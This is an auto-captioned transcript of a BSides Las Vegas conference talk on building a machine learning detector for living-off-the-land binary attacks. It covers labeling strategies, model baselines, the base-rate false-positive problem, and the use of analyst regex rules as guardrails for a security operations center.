
good afternoon welcome to besides Las Vegas ground truth track this talk is weeding out living off the land attacks at scale given by oh God I forgot your name by adarsh um a few announcements before we begin uh we'd like to thank our sponsors especially our Diamond sponsors LastPass and Palo Alto networks our gold sponsors Amazon and vizium and Google is their support along with our other sponsors donors and volunteers that make this event possible these talks are being streamed live except in underground track and as a courtesy to our speakers and audience we ask that you check to make sure that your cell phones are sent to silent or vibrate if you have a question uh we're
actually doing questions at the end if you do have one use this microphone that I'm standing at in the middle of the room so YouTube can hear you um as a reminder the B size LV photo policy prohibits taking pictures without the explicit permission of everyone in frame these talks are all being recorded and will be available on YouTube in the future again with the exception of underground of course please keep your mask on at all times um if you want to move closer to the middle of the room please keep social distancing in mind as well um with that let's get started welcome a darsh [Applause] thank you um can everyone hear me okay all the way
at the back all right sounds good um so hi everyone I'm adarsh I'm a resource manager at surface Ai and today I'll be talking about weeding out living attacks Escape um so a little bit about me um I have been working at the intersection of security and machine learning for is it cutting out I feel like it's cutting out okay
[Music] sorry about that um so I've been working at the intersection of data science and machine learning for four and a half years all of that has been at surface AI I joined right out of grad school I completed a master's degree in computer science with a specialization in artificial intelligence and machine learning at UC San Diego currently I live in Denver with my dog and I'm originally from India I grew up in Bangalore and moved to the U.S for grad school so before I begin uh talking about the technical details of this talk I'd like to mention that this uh the work that went behind this talk is a huge collaborative effort across several
teams in Sophos AI uh this involves data scientists data Engineers threat analysts software engineers and program managers and I'd like to take a minute to uh to acknowledge their contributions and thank you for anyway now let's get to the technical specifics uh what is this talk about this talk details the development of a machine Learning System that detects living off the land binary attacks the system is supposed to be another detector or sensor that feeds alerts into the security Operation Center if you attended Ben's talk yesterday uh Ben Gillman from sofas AI uh you got some context on how we have different sensors that feed into our feed alerts into our security operations center and how these
alerts are manually then reviewed by uh our sock analysts so we look into the technical details of how we designed the system that surfaces living off the land binary attack alerts um the challenges we face during the development of the system the strategies we use to mitigate them and finally the generic lessons that we learned along the way if you attended Josh's talk yesterday uh you'll remember this slide um spoiler alert I come to pretty much uh the same conclusion at the end of this talk uh but I just take a different path um I use this uh project as kind of a case study to demonstrate uh each of these points that he made yesterday
okay so what are the goals of this system because it's important to define the goals before we start working on it um so the first goal is to surface surface additional living off the land attacks to the security Operation Center uh that are not yet uh being detected by existing methodologies but more importantly the second goal is since this system is going to surface alerts to a security Operation Center it's not supposed to be flooding the stock with alerts especially not false positive alerts now that we have the goals squared away let's move on to understanding the actual problem what are living of land binary attacks living off the land attacks or Urban attacks in short are attacks that
involve the use of binaries that are either pre-installed by the user in a system or existing system binaries uh these binaries are used in a malicious way uh and that's what constitutes a urban attack and in general the attack Vector for this attack um is a command line that is executed against set binary these attacks tend to be extremely hard to detect uh and defend against for many reasons uh some of which are that they have a very small footprint on the user system sometimes it's really hard to differentiate between like legitimate this admin activity and love win attacks and several other reasons so um our problem is that we want to detect uh loving attacks with machine learning
so is this uh a good nail for the hammer of machine learning um in order to determine whether this is a good candidate solution to be solved by Machine learning uh we need a couple of things um we've established that the artifact that we can use to detect a lulman attack is usually the command line that is executed so we need a lot of Representative command line data that is very similar in distribution to the actual command line data that we'll be predicting against second we need a lot of good labels for this data in order to teach a machine learning model what is a malicious command and what is a benign command we need to have plenty of
examples that span a wide variety of use cases well the first problem is not really an issue because uh working at a large security vendor we have plenty of access to the actual distribution of command line data that we'll be predicting against um we in this work we limit our uh we mainly focus on uh detecting and surfacing alerts to the MDR to manage detection and response system and there we have about a 1.5 billion command line invocations per day across all our customers which feed into the existing detection and alerting system so this is the data that we actually want to plug our model into and surface additional alerts um a machine learning based detector is
actually the perfect addition here considering the incoming data volume because invariably when you have one and a half billion command lines there are a few attacks that are like getting through that are probably being missed right now [Music] so having data is not an issue but but often we run into snags when uh uh we need to have enough labels um finding labels for command line data can be a little harder and it also often becomes a catch-22 problem where you know if you have a reliable quick and accurate way to label your command lines then why do you need a machine learning model um to detect little bins however uh we don't have any such quick reliable
systems so we have to resort to uh three prong strategy to label the command line data that we've got
um so here are the three different strategies that we use uh to label our data the simplest source of labels for our problems this lies in past data some LOL bin attacks have already been seen and investigated by the security Operation Center and we have that information stored so you can just directly use it the Second Source uh where we got really creative is uh indirect labels sofas has a lot of different products and across all these products we have labeled data for several artifacts like files and URLs um and we can use this information to indirectly label command lines for example if a malicious file in a user system also triggers the execution of a
malicious command line there we have an example of a known malicious command line that we can use to augment our training data um and the third strategy that we used uh is that we now have a dedicated group of threat analysts that are part of sofas AI who distill all the information from like the first two sources and all the knowledge that they have uh and create roles these rules can be used for labeling our data so here's an example of the indirect labeling through a surface product that I talked about um intercept X has something called root cause analysis where um when it finds a malicious file it constructs a graph of all operations
that a triggered a triggering file performs on the user system so this involves like touching files deleting files creating processes and more importantly uh running command lines so we collect a lot of potentially malicious command lines from this data and here on the slide you can see an example of like a root cause analysis graph and a command line that we obtained from their uh that could potentially be malicious um some other sources for indirect labeling uh we use sandbox Behavior reports uh one good thing about sandbox to behavior reports is that the detection engine hooks into Windows anti-malware scan interface which means that it gets access to the actual blob of code that is executing when a command
line invocation happens which means it can get through a lot of issues that obfuscation or like when you're trying to execute code from PS1 file uh we can't see what the contents of the PS1 file are from the command line itself so we get a lot of uh indirect labels from that Source we also do URL lookups where through the Mexican web uh product we have like a repository of URLs that are labeled to be malicious of benign and if there is an embedded command line embedded URL within a command line then we can look up that embedded URL and see if it's something malicious so like if a command line is operating on a malicious
URL it's more likely that it's going to be malicious [Music] and then uh the Final Approach uh which is like manual review and labeling through uh incident investigation data um so here we have our and let's go through instant investigation reports and manually review whether the case was actionable whether there are associated Global command lines in the incident and then they create rules using regular Expressions to capture future occurrences of such commands and these rules are categorized into four different types so there are strong malicious rules a malicious rule is given to like a known malicious command line uh or a known attack and is given only in cases of really high confidence right you can
treat this as basically a block list um an example is when yeah we have a known attack pattern uh like a partial command is performing an unsecured download through a very specific Port so that's a good way to like identify that something that we've already seen before is happening on a user system and then there are suspicious uh rules uh so if command line activity is seen as potentially malicious but we don't have high enough confidence to completely convict it um then it receives a suspicious label it's an example like listing credentials which is suspicious Behavior but could also be legitimate in a different context such as Vanessa's admin is trying to like look at credentials or
something then we have uh the other side of the coin where we have uh weak benign labels or debatable labels uh potentially benign activity is given this week the nine label and we think this activity is more likely to be benign but a machine Learning System could potentially appear on it because it's doing something strange like you know it has a big basics for encoded Chunk in it uh that could that a model could see as potentially malicious and then we have a strong benign labels which is basically known benign activity and for our machine learning experiments we basically take the first and last category of rules uh the block list and allow list and augment our labels
um using these rules um and the suspicious and debatable rules are used in a different way which I will get to in a different section so in a nutshell uh here's the entire labeling strategy there are two label sources that are indirect labels that are obtained by cross referencing command lines and then there are command lines that are found in malicious based on incident investigation reports um and then there are human analysts who are looking at both these data sources and creating rules uh which are also then used uh to augment the the labels that we have um at the end of this um labeling strategy we end up with a labeled data set which we can finally use to
experiment with different machine learning models so here are some data statistics for the data sets we used to train our machine learning model we have about 76 million uh samples in our training set out of which about 1.6 million are malicious 7 million samples in the validation set or with 70 000 are malicious and then about 12 million samples in our test set so importantly here we use time splitting and I think my colleague Ben talked about this too in his talk about how it's really important time split where you're essentially simulating uh new data so your model has seen for example in this case the model has seen data until first April 2022 in the
training set so when you're trying to validate the model when you're trying to test its performance you're not giving it any command lines that it has already seen so it the validation set is created in such a way that there is no overlapping commands uh and it com it contains only the command lines that are seen after first April 2022 in our systems uh is the same with the test set where uh we collect data from the first May of 2022 to the first July of 2022.
um and then we first train a baseline model on this data we use Baseline models as a simple Benchmark before uh training on more complicated models so that we keep track of how well the actual models are doing and that they're not uh performing worse than the simplest possible model that we could use um so for this Baseline model we pre-process the command lines remove white space uh decode any basics for encoded chunks and then develop a feature representation foreign consists of like three different parts um we we generate summary statistics uh for the number of transitions between six different character classes we have digits white space uppercase vowels lowercase vowels uppercase consonants and lowercase consonants and we count
the number of times in a command line we have transitions between those character classes so we basically get a six by six grid of counts which we then flatten into 36 different features we also count the number of occurrences of special tokens like a Powershell invoke expression or a dollar sign that could indicate like the that you're trying to use a variable inside a command line um and then the final kind of features is like the number of special symbols that are used uh in the which in the command line like opening and closing braces but there are any URLs used and also uh we ultimately use the length of the command line and uh for the machine learning model we
use a simple XC boost model for our experiments so that was the Baseline model and then we also conduct our experiments against two convolutional neural networks in order to provide the command line as an input to these models though we need a different kind of feature representation we first need to convert these characters into integers as a way that the model can consume it so on the slide I have a simple example of how we do this with just uh uppercase alphabets so if I created if I created an integer representation for um alphabets A to Z where I give them like numbers starting from 1 to 26 uh then if I have a string called string that says
b side to Las Vegas I can replace all the characters with the associated integers replace white space with zero and then I have a list of numbers that represent that string um the only difference between uh the feature representation that we develop and the example here is that the size of the vocabulary or the number of characters we consider is a lot higher uh and for the command lines we basically consider all all printable characters and um these are the two neural network models the convolutional neural network models that we experiment against the one on the left is a simpler architecture with a single conversion layer and a small dense layer and the one on the right
is actually a neural network architecture that we have used in the past to detect many different string artifacts like URLs or file paths or um yeah registry keys any any string artifact basically um so you can read about this this uh model architecture on our site uh where one of our data scientists sarnath has written a great explainer blog post uh so I won't go into details of the network architecture here in the interest of time so um these are the model results that we got for the three different models these are the best results that we've obtained after hyper parameter optimization um if you're unfamiliar with this plot let me take a quick aside to explain
it's called the receiver operating characteristic curve or the rock curve for short it basically plots the true positive rate on the y-axis against the false positive rate on the x-axis for different thresholds of model score um let me break that break that down a little bit so the true positive rate is the number of correct malicious predictions of a model against the total number of true malicious commands in the data the false positive rate is the number of false positives as a fraction of the total number of benign samples in the data so the machine learning models that we train here basically output a score between 0 and 1 with a higher score denoting a greater chance of a command
line to be malicious so when I talk about deciding what threshold to use that's the value that I'm talking about where if I decide that anything above 0.5 is what I'm going to consider as malicious then I'm gonna get a different subset of malicious commands detected by the model as opposed to if I used 0.6 so that's my threshold so why do false positives happen and why do the true positive and false positive rates change based on the thresholds that we use for a model um when we train a machine learning model what it is doing is learning an association between the inputs and the outputs as we saw in the case of command lines a machine learning models can
consume numeric uh inputs so we need to create numeric representations for the artifacts that we want the model to predict on so we can't just like Supply it with a command line we need to create a representation for that command line um and in an ideal case uh just like on the left the representation that we chose for our data uh might make it easy for the model to separate out the good from the bad like instead of uh coming up with like 50 numbers if you came up with two numbers that represented your data and plotted it on a scatter plot like that uh then if you chose your two numbers correctly ideally you sh you
should be able to like separate out your good from your bad samples but unfortunately this is only an ideal case and in a real case uh the nature of the data itself often does not let you do this uh so the real case is much closer to something on the right uh which is why if you change your threshold and if you change the location where you draw the line you get a different false positive rate and you get a different true positive rate like you and you're basically uh the problem that the optimization problem that you're trying to solve here is whether you are going to bias towards creating more false positives or false negatives and like I
mentioned in our uh in the cold section before uh we definitely do not want to create a lot of false positives and uh even if it is at the cost of a few false negatives we want the system to be more usable and creating a lot of false positives this makes the whole system useless so that was a lot of information so I'm just gonna pause here for a few seconds uh this is my dog his name is Hobbs I named him after my favorite character my favorite comic book Calvin and Hobbes um when I got him he was supposed to be five years old and a lab puppy uh but turns out the rescue
made a mistake and he's actually a lab beagle mix so he's actually an adult and looks like a lab puppy now that's a false positive I don't mind
people okay um so we described the machine learning model that we trained we described the results that we got um a simple question is this Deployable so what we did was we looked at the output of this model when we plugged it into a one percent sample of our one and a half billion command line event stream and this is what happened this plot basically tells us the number of detections by the machine learning model on a daily basis for like the past three weeks you can see that it's creating hundreds of alerts which practically makes it unusable because it's very unlikely that there are actually hundreds of living off the land binary attacks happening so
we had a model with a reasonably good accuracy um that is doing really poorly why is this happening this doesn't seem like expected Behavior right um well this is known as the false positive Paradox or the base rate fallacy and this is commonly seen in a lot of uh machine learning applications especially in security let's say that we have uh let's understand this with an example let's say that we have a near perfect ml model even better than the ml models that I've trained so far like I could read I could conduct research for another like five years and get the best possible model out there and let's say it has a true positive rate of
100 which means that if it ever sees a malicious command it's always going to detect it as malicious and the only downside is that out of every 10 000 command lines that it sees it's going to say that one of them uh 10 000 benign command lines it sees it's going to say that one of them is actually uh positive so it's gonna make one false positive out of every 10 000 samples this is a really good model right uh but somehow if you actually compute the math uh when plugging into our event stream it turns out that this model creates uh so if we plug into an event stream and assume that there are 150 malicious command
lines a day and one and a half billion benign command lines a day which is probably close to the real number uh and it generates 150 true positives it has a hundred percent true positive rate so it's going to detect every one of those malicious commands but what happens to the false positives since we have one a half billion benign commands even a model that can create only one false positive for every 10 000 samples it still creates a hundred and fifty thousand false positives and at that point like the machine learning model is really not helping the stock analyst and the stock analyst is just going to drown in alerts and if you do the math that is
one true positive per like 1001 false positives which is a terrible model accuracy number um so why does this actually happen uh if you notice if you look at the distribution of malicious versus benign that is the main culprit here we have very few malicious commands or a very low base rate of malicious commands uh compared to the number of benign commands so hypothetically if you had a 50 50 distribution if you had 750 million malicious commands and 750 million benign commands and you ran them through the same model that model would produce 750 million malicious detections for 75 000 benign detections which is which is really great it's like 10 000 true positives for every false positive
um so yeah this this is uh the main problem that we face when trying to apply machine learning to this uh to this use case so how do we work around this problem what is the solution is the system completely useless have we failed our goals well not quite uh there are options as Josh and others have mentioned before in their talks uh deploying ml is a standalone system almost never works especially in security and because we always have this kind of skewed data distribution um so what we need are guard rails we need to control when the machine learning model actually comes into play so that it can contribute where it performs best so we don't apply to every
single command line that we see we apply it selectively what guardrails should we use uh earlier we talked about using analyst defined regex rules to augment our labeling and I alluded to this that we also have suspicious and debatable labels that we use uh which is exactly what we use for gut records in this case um so just to detail the system a little bit here um if we have no rules matching for a given command line then it doesn't matter what the MS code is we are just not going to create an alert here are some examples where the machine learning model thinks that something is malicious but there are no regex matches so we're
not going to alert and if as you can see it seems like these are not actual malicious commands but we also notice that our machine learning model has a bias towards detecting smaller commands as malicious because it has very little information so it's behaving in an unstable way and then if any of our strong Rules matches uh any of our high confidence roles matches then we don't feel the need to go to the machine learning model uh to tell us whether something is malicious or benign we just directly take the output of the rule and we decide whether to surface an alert or not but the real contribution of the machine learning model comes when there is a
suspicious rule that is triggered so if you remember a suspicious rule is when there is potentially malicious activity but we are not entirely sure because in some contexts it could be used in number nine way so here we use the model to say that if the model scores highly on uh command line that triggers a suspicious rule then we generate an alert and if not then we don't generate an alert we actually create uh something called a silent detection where we want to review it later um and so uh keyboard surface and alert but we'll store it in our Telemetry uh for further review and then we have a debatable rules um and again we do something similar
where if there is a debatable rule that is triggered then we look at the ml verdict uh if the ml if the machine learning model says that a debutable rule is um sorry is is a command line that triggers a debatable rule is malicious then we create a silent detection and wait for further review uh but if the machine learning model says that something is benign and it triggers a debatable role then we don't surface an alert so there was a lot of information and I want to put it all together and um provide sort of high level context uh just to reiterate just so you understand all the pieces that go into the system
um so during machine learning training we collect data from the event stream uh we clean and Sample it and then Source labels from three different locations we have indirect labels we have pass data and then we have allow list and block list rules that analysts have created um using this label data set we then train a machine learning model and then when it comes to prediction we plug both the machine learning model and the analyst created rules into our system and we only create alerts in two separate scenarios one of them is if a block list rule is triggered and the other is if suspicious activity is detected and the Machine learning model also detects the same suspicious command
line so um we started off saying that we wanted to surface additional alerts into the system while not flooding the sock uh did we actually meet this goal uh this part plot shows us the total number of unique alerts that we generated per day when the system is deployed and uh looks like we certainly create a manageable number of alerts now at least compared to the previous system the blue bars here denote the number of alerts that are generated by the block lists and the orange bars denote the number of command alerts that are created by suspicious command lines that are detected by the machine learning model so it looks like on most days the system
does not create more than 50 alerts a manageable number of alerts is well and good but how good are the alerts actually um so it's important to create alerts that are very likely to be malicious because we want to build a stock analyst trust in our detector so we want it to be um as precise as possible this plot shows the true positive rate and the false positive rate for the alerts generated by the entire system when plugged into the event stream uh computed on a weekly basis for the past four weeks we see that the true positive rate hovers between 0.9 and 1 which is a pretty good rate of um you know detections of a pretty good
Precision uh combine this with a manageable number of alerts and we think we have a very Deployable system um the second question did we actually add value um the plot here shows the number of alerts that were seen in the entire system on a weekly basis for the past three weeks uh the teal block basically shows the number of alerts that were created by the existing system uh The yellow section shows the intersection which is like the existing system also detected these attacks and our system also detected these attacks and the blue section which is the most encouraging is the new alerts that were surfaced by just our system and burnt Surface by the existing system
um and although this number is small right now we have nowhere to go but up and over time we think that our system should improve significantly and produce more actionable alerts a big part of our system is the involvement of surface the surface AI analyst team who have created dashboards that consistently continuously monitor the performance of the system uh they then use this uh information to tweak their rules catch false positives and improve the guard rails as a continuous process and again this is uh in line with what Josh talked about and what Ben talked about it's in involving humans in a feedback loop in order to improve the continuously improved performance of our systems
so a quick summary of everything that we talked about um in this talk Lil win Attack detection is a hard problem with several challenges there is a large data volume there is a low base rate of malicious activity and labels are hard to combine we've demonstrated some strategies that we've used to mitigate these problems and work around them um another important lesson that we learned here is that good data engineering really pays off dividends we basically went fishing through our data Lake and got as much data as possible uh in order to label our Command lines and increase label coverage um we got yeah we got representative data we had a good labeling strategy and
we also created dashboards um perform transferred validation and Analysis to ensure continuous Improvement of our system another lesson that we learned here is that the best machine learning models cannot perform well as a standalone system they need guardrails uh and the way forward basically is to integrate rule-based detection and human analysts into the machine Learning System and create continuous Improvement and feedback loops and that's all I've got for today thank you any questions foreign [Applause]
I'll be around in the room if you have any questions you can come up to me and ask me more thank you